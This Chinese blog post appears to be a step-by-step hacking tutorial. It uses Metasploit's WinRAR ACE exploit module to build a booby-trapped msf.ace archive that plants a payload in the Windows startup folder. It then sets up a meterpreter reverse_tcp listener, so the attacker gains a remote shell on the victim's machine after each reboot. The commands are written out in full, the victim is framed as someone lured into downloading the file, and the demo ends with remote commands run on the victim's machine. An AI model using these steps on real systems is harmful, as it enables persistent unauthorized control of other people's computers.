电脑重启也可以被远控 | 一个神奇的WinRAR文件

作者:FancyPig | 发布时间: | 更新时间:

相关阅读

data-postsbox="{"id":29124,"title":"如何nc远程控制任何Windows电脑","author":"FancyPig","author_id":1,"cover_image":"https://static.pigsec.cn/wp-content/uploads/2022/12/20221224022244542.png","cover_video":"https://v.pigsec.cn/Remotely%20Control%20Any%20PC%20in%204%20mins%2059%20seconds_ts.m3u8","views":3175,"comment_count":6,"category":"knowledge","is_forum_post":false}">{"id":29124,"title":"如何nc远程控制任何Windows电脑","author":"FancyPig","author_id":1,"cover_image":"https://static.pigsec.cn/wp-content/uploads/2022/12/20221224022244542.png","cover_video":"https://v.pigsec.cn/Remotely%20Control%20Any%20PC%20in%204%20mins%2059%20seconds_ts.m3u8","views":3175,"comment_count":6,"category":"knowledge","is_forum_post":false}
data-postsbox="{"id":28771,"title":"用这个简单的工具远程控制任何电脑!","author":"FancyPig","author_id":1,"cover_image":"https://static.pigsec.cn/wp-content/uploads/2022/12/20221218021041471.png","cover_video":"https://v.pigsec.cn/Remotely%20Control%20Any%20PC%20With%20This%20Simple%20Tool%21_ts.m3u8","views":4276,"comment_count":20,"category":"knowledge","is_forum_post":false}">{"id":28771,"title":"用这个简单的工具远程控制任何电脑!","author":"FancyPig","author_id":1,"cover_image":"https://static.pigsec.cn/wp-content/uploads/2022/12/20221218021041471.png","cover_video":"https://v.pigsec.cn/Remotely%20Control%20Any%20PC%20With%20This%20Simple%20Tool%21_ts.m3u8","views":4276,"comment_count":20,"category":"knowledge","is_forum_post":false}
data-postsbox="{"id":22881,"title":"黑客如何通过一个bat文件控制整台计算机","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":4835,"comment_count":14,"category":"knowledge","is_forum_post":false}">{"id":22881,"title":"黑客如何通过一个bat文件控制整台计算机","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":4835,"comment_count":14,"category":"knowledge","is_forum_post":false}
data-postsbox="{"id":17739,"title":"【视频讲解】黑客常用的远程命令执行实战及演示","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":4497,"comment_count":5,"category":"knowledge","is_forum_post":false}">{"id":17739,"title":"【视频讲解】黑客常用的远程命令执行实战及演示","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":4497,"comment_count":5,"category":"knowledge","is_forum_post":false}
data-postsbox="{"id":9833,"title":"如何远程控制任意安卓设备2.0(androRAT)","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":9228,"comment_count":32,"category":"knowledge","is_forum_post":false}">{"id":9833,"title":"如何远程控制任意安卓设备2.0(androRAT)","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":9228,"comment_count":32,"category":"knowledge","is_forum_post":false}
data-postsbox="{"id":8451,"title":"如何通过发送一个PDF文件 远程控制整台计算机?","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":5134,"comment_count":18,"category":"knowledge","is_forum_post":false}">{"id":8451,"title":"如何通过发送一个PDF文件 远程控制整台计算机?","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":5134,"comment_count":18,"category":"knowledge","is_forum_post":false}

视频讲解

本期视频我们将为大家带来metasploit使用的小技巧,通过使用其中的WinRAR文件,可以实现用户在重启电脑后,自动加载Payload到启动文件中,这样就可以实现即使是重启,依旧会被持续远控,是不是还蛮有意思的!

图文讲解

使用metasploit生成msf.ace文件

首先,你需要启动metasploit

sudo msfconsole

然后搜索winrar模块

search winrar

这里我们使用的是exploit/windows/fileformat/winrar_ace模块,输入

use 0

然后,通常在使用模块的时候,你可以输入

show options

来查看有哪些需要我们进行设置的

我们需要设置LHOST为我们的kali linux的IP地址

set LHOST 192.168.0.106

如果你不知道你的kali linux的IP地址,则可以使用ifconfig去查看下

之后我们输入

run

可以看到我们的msf.ace已经存储在了/root/.msf4/local/msf.ace位置了

设置监听端口

我们现在需要使用exploit/multi/handler模块,设置监听端口

use exploit/multi/handler

然后输入下面的命令

set payload windows/meterpreter/reverse_tcp

然后设置LHOST为kali linux的IP地址

set LHOST 192.168.0.106

输入下面的命令开始监听

run

模拟受害者

我们这里模拟热心网友,去下载了这个文件(当然,通常可能还需要一些技巧,我们这里就当作最终结果是下载了该文件)

我们这里为了给大家更深入的进行演示,你可以在开始菜单中输入run调起下面的界面,然后输入

shell:startup

这时,我们可以看到启动项文件目录,这里是什么都没有的

但是,如果我们运行了msf.ace文件,可以看到会多出一个文件

一旦电脑重启,就会每次加载我们的这个恶意文件

我们重启下

重启后登录

然后回到kali linux,可以看到我们已经接管了cmd面板

之后,我们可以尝试输入下命令,看看有没有效果,可以看到命令都可以正常输入

然后我们可以给热心网友一个有趣的POC ,创建一个hacked.txt文本,其中写上”sweet dreams“(当然,你也可以写其他的,比方说”你已经被黑了,老弟“)

echo "sweet dreams" > hacked.txt

然后打开这个文本

notepad hacked.txt

然后,我们回到热心网友的Windows界面,可以看到记事本弹出来了

至此,演示结束。

标签:网络安全, metasploit, msfconsole, 远程控制电脑, metasploit教程, 远控软件, 黑客入侵软件下载, msf是什么文件, msf是什么意思, msf渗透工具, msfconsole命令大全, msfconsole下载, 黑客远程控制电脑, msf.ace, winrar远控, 压缩文件远控